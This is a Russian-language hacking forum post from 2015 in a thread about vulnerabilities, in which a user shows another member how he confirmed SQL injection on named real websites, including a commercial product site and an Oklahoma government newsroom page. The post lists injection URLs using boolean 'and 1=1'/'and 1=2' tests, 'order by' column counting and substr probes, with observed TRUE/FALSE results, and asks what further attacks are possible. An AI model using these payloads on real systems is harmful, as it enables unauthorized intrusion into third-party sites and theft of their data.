Тема
:
Ваши вопросы по уязвимостям.
Показать сообщение отдельно
#
280
02.07.2015, 22:55
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197
Репутация:
25
Цитата:
Сообщение от
XAMEHA
↑
А где вы SQL Injection обнаружили? Вроде чисто.
ну как.
http://www.haynes.com/products?sear...=2009&make=Boatian&model=BT125-3'+and+1=1+--+
- TRUE
http://www.haynes.com/products?sear...=2009&make=Boatian&model=BT125-3'+and+1=2+--+
- FALSE
А так же
http://www.haynes.com/products?sear...09&make=Boatian&model=BT125-3'+Order+by+2+--+
- TRUE
новость вылазиет при true. так же при некоторых командах вылазиет белая страничка
2) А тут можно что нибудь сделать?
http://www.ok.gov/triton/modules/new...123,1,1)=1+--+
http://www.ok.gov/triton/modules/new...order+by+1+--+
http://www.ok.gov/triton/modules/newsroom/newsroom.php?id=109+and+substr('a',1,1)='a
'
Br@!ns
Посмотреть профиль
Репутация
Найти все сообщения от Br@!ns
Добавить в друзья
